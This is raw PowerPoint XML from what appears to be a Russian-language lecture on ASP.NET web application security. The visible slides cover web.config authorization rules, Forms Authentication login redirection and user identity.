              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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432F2552-BF3F-427A-9A69-971C76F323AF}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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31EAF349-7195-4BD8-93BF-B65DBB04DBCE}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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12A86522-CBA1-4708-B70B-B76FCDD6FAFB}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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43B66CE0-C197-4AEA-BAA7-1195900DA53D}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>“?” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>анонимные пользователи</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>&lt;deny users="?" /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>“*” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>все пользователи</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>&lt;deny users=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>*" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ru-RU"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67F781F5-096E-4686-8B73-E4E3D6B96125}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F055EF1C-A937-46DC-A785-31D4F5230C2D}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/31/2010 3:43 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154627" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>©2005 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154628" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8DD89D95-45F7-4B99-B4B8-BD15149B41FE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154629" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154630"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F97060EF-AC2A-4E4B-895B-0E38293212ED}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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0EBE9A93-47B3-4AEC-9683-D878014B1189}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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CA618B2A-99BB-4527-B5E7-93B1769EAB49}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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B325A529-3E39-4081-82F7-11068888F360}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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ADA33889-D32A-40D3-841C-EA4911D56011}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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506460FC-40B2-4A4D-9A52-5D825DF52B3D}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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BECD1920-BDE9-4F20-BB28-9D253333A90A}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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9C553777-2D5B-4C13-A585-F2E2E2588C1F}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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69FCDB5A-EF33-4753-8349-B15C01B4330C}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB5AF0BD-11A0-4505-9627-415CC2CC3836}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/31/2010 3:43 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155651" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>©2005 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155652" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{03D01F1F-4E03-4207-9562-E0E41AE7E73B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155653" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155654"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DEFE33A2-257F-4B91-92DC-C9D7A92857E7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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59610EC2-33AE-44E6-AC02-2DF247B8279C}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Метод </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>FormsAuthentication.RedirectFromLoginPage(UsernameText.Text, false);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Выполняет несколько действий</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Создает для пользователя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> authentication ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Шифрует информацию </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>authentication ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Создает куки для хранения шифрованной информации </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Добавляет куки к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>HTTP response, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>для отправки его пользователю</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Перенаправляет пользователя на запрашиваемую страницу</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>которая содержится в параметре строки запроса при переходе к странице подключения</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"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F791AA0D-2CED-4ABD-961C-3B9E87AAF160}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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9FA97F1D-CFA8-484F-AF52-48F52840B464}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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4355CD0C-A6CE-4139-A3D7-45A36AE73BF4}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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E79A2566-E859-4147-AD6D-3687ECEC9DC1}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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41E74DBD-5AC6-4210-9BFC-EB2A36D5F92B}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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69B5F3F-D0AE-4742-AB2F-8C9BA8C49C6F}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>HttpContext.Current.User.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Identity</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"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36B53810-90EB-49B3-ACC8-B404A1AC1632}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6D674D43-9D12-4B7A-8DEF-35A15E1409AD}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/31/2010 3:43 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156675" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>©2005 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156676" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{49751FBE-B196-44B4-904F-ADC7E57549AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156677" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156678"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7A86B139-1BA0-4014-A1CA-22DD168F02E3}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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54132BD2-7A18-47CF-A1AD-9A720E0C56CD}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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826CE52B-26B4-4E96-B7ED-69FD6C9AFF89}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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D99C9E79-1993-42FE-8908-6D3FDC8D0507}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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3EE8725A-7F44-4B36-8677-1C47A9DCEAA1}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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2ACF4A53-2239-471E-8441-224DD25F213C}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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6609EA24-2329-4774-B3FD-433D1D6A193F}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Forms Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>решает важную задачу поддержки безопасности.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ru-RU"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0DA8BFD5-7F5D-43D0-A9AB-025B30C2139B}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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1142EC6D-3F79-4AFF-8852-3050752CEB70}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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144B7473-86E0-4429-B371-375EE4191F31}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{563AA20C-3867-4B14-89AB-86F782AFCD8E}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/31/2010 3:43 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157699" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>©2005 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157700" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A9647315-1FC8-4B8A-9E48-4533770B7A22}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157701" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157702"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609A75DE-2659-4F50-A520-F4C61D0ED8FE}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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3A9B0C9F-FD6E-476A-B0FE-83D976BCE325}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>93</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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5B0CF6E9-CAAC-4515-AA77-2E5697F7BBFF}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>94</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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0C6F19E3-C677-4917-96AD-26C424AB8443}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>95</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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10D9557D-22FF-472D-AF3D-F8D1D2583A13}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>96</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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4E238FAD-2E05-4CA1-8D5B-C03E5F9BCC4C}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>97</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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6FB338E3-0C4C-432E-801A-14FF7539F60F}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>98</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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15F02506-1E46-4979-83E9-8BDE32479224}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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A86C689-C1FB-4543-A883-E076862EFF75}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>100</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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4C711D8D-8A7E-438B-8A67-A83656942A5F}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>101</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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489C717A-D8AE-4C3C-AF94-AEBCEEF036B5}"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2994E8C-4675-40E7-842E-145CFF5FE4DB}"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739214C7-A58C-4151-B14F-4B65F27B3096}"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457200" y="1600200"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="ru-RU"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30E860A2-EB24-4036-8293-285023F73E9E}"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7BF7D7CD-EB88-446F-BCCB-FB4E4F93D356}"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3BF37A79-20D4-4A15-9F4B-AE10C54E5E39}"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100C8258-5898-48E2-97CB-67092FF06073}"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78BA16D2-6677-404A-B4FC-97D796E0E176}"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99010A46-809D-448A-BAA5-731A42EC6F47}"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9B58E113-8BF3-44B5-A192-B7C64172E3F0}"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3B065B24-F741-4579-8930-9A2D75046701}"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9DD48F57-1C80-4A0D-89BB-F5A24DC81A6C}"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6A861B97-9612-4C6D-AA19-21B80D153A2E}"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47211AAE-8065-4180-930D-26B7A0CD968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ms-help://MS.VSCC.v90/MS.MSDNQTR.v90.en/fxref_mscorlib/html/ff35b1f1-386c-370b-2c36-a48e7dcbc147.htm"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ms-help://MS.VSCC.v90/MS.MSDNQTR.v90.en/fxref_mscorlib/html/3e108182-236f-5ccb-b5ee-e91a6d09cea0.ht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ru-RU" smtClean="0"/>
              <a:t>Лекция 11</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3886200"/>
            <a:ext cx="6400800" cy="1271588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Поддержка безопасности </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>приложений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How it works…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3606800" y="4699000"/>
            <a:ext cx="9144000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
